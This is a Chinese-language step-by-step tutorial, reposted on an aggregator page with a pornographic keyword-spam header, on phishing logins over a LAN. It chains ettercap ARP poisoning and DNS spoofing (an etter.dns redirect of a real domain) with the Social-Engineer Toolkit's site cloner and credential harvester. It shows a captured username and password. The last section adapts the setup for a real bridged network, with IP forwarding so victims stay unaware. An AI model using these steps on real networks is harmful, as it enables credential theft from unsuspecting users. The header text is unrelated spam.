日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

社会工程学攻击案例-网站钓鱼

發布時間:2023/12/20 编程问答 39 豆豆
生活随笔 收集整理的這篇文章主要介紹了 社会工程学攻击案例-网站钓鱼 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

社會工程學攻擊案例-網站釣魚

滲透攻擊原理


攻擊機與其他主機在同一局域網內,通過 ARP 欺騙使其他主機的流量都經過攻擊機,有選擇性的抓取數據包,例如攻擊者想要竊取用戶登錄百度網站的信息,采取克隆站點的方式,來強制引導用戶主機的流量。 該攻擊方式需要執行以下三個步驟:
1、ARP 欺騙
2、域名劫持
3、網站克隆

BT5實現

1、啟動社會工程學攻擊集

root@bt:~# cd /pentest/exploits/set root@bt:/pentest/exploits/set# ./set

2、選擇網頁攻擊

1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) Third Party Modules 10) Update the Metasploit Framework 11) Update the Social-Engineer Toolkit 12) Help, Credits, and About 99) Exit the Social-Enginee r Toolkit Select from the menu: set>2

3、選擇賬號竊取

1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Man Left in the Middle Attack Method 6) Web Jacking Attack Method 7) Multi-Attack Web Method 8) Create or im port a CodeSigning Certificate 99) Return to Main Menu set: webattack > 3

4、選擇克隆站點

1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack > 2

5、開始克隆

set:webattack > Enter the url to clone: http://10.10.10.129/signin.html Press {return} to continue.

6、靶機測試
之后再靶機上用瀏覽器輸入 http://10.10.10.131,并填寫登陸用戶名和密碼

7、賬號獲取

[*] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: username=admin POSSIBLE PASSWORD FIELD FOUND: password=dvssc@admin01 POSSIBLE USERNAME FIELD FOUND: Login=Login

Kali Linux實現

一、域名劫持(域名欺騙)ettercap

1、啟動 ettercap

ettercap -G

2、主機掃描

3、ARP欺騙

此時去靶機 ARP 表查看是否毒化。

4、流址抓包

5、DNS欺騙
編輯 DNS 劫持內容

vim /etc/ettercap/etter.dns home.51cto.com A 10.1.1.10 //將這個域名劫持到本地 IP,若是*.51cto.com,則是將51cto.com為后綴的都映射到本地攻擊者的IP,然后攻擊機將登陸的克隆頁面放回給靶機


開啟 DNS 欺騙泛洪

雙擊此模塊則開啟,再雙擊則關閉

PC 上測試 DNS 欺騙

二、網站克隆

1、啟動 SET(路徑與 BT5 不同)

cd /usr/share/set ./setookit


2、選項1,社會工程學攻擊

3、選項2,網頁欺騙攻擊

4、選觀3,網頁克隆攻擊

5、選項2,單個站點克隆

6、輸入攻擊機的 IP 地址

7、輸入克隆的網頁地址

8、開始克隆網頁(開啟 apache)
若 Apache 服務默認沒有開,這里會提示是否開始,選擇y;
肉雞訪問本地IP地址,則訪問的是一個虛假的 home.51cto.com,當肉雞往這個頁面填寫如用戶名和密碼的時候,則可以被我們發現。

三、在靶機上測試效果

1、靶機能夠 ping 通攻擊者的 IP 地址

2、靶機瀏覽器輸入攻擊者的 IP 地址

3、靶機上輸入用戶名和密碼

4、點擊登陸之后會進入真實的網頁
這個是真實頁面,但是剛才點擊登陸的時候,密碼已經被截獲

5、打開攻擊者緩存文件查看用戶密碼

真實環境實現(Kali 橋接)

VMware模式:橋接模式/NAT模式

修改 IP 和路由(一次性)

ifconfig eth0 192.168.199.87 netmask 255.255.255.0 up //設置IP地址 route add default gw 192.168.199.1 //添加默認路由

修改 IP 和路由(永久性)

vim /etc/network/interfacesauto eth0 allow-hotplug eth0 iface eth0 inet static address 10.1.1.212 netmask 255.255.255.0 gateway 10.1.1.254

為了使被攻擊機被欺騙后仍可正常上網,需要添加路由轉發功能

root@PL-kali:# vim /etc/sysctl.conf # Uncomment the next line to enable packet forwarding for IPv4 net.ipv4.ip_forward=1 //將前面的注釋#刪掉,并重啟機器reboot

修改DNS服務器

root@PL-kali:~# vim /etc/resolv.confnameserver 223.5.5.5

剩余操作和虛擬環境下相同。

總結

以上是生活随笔為你收集整理的社会工程学攻击案例-网站钓鱼的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。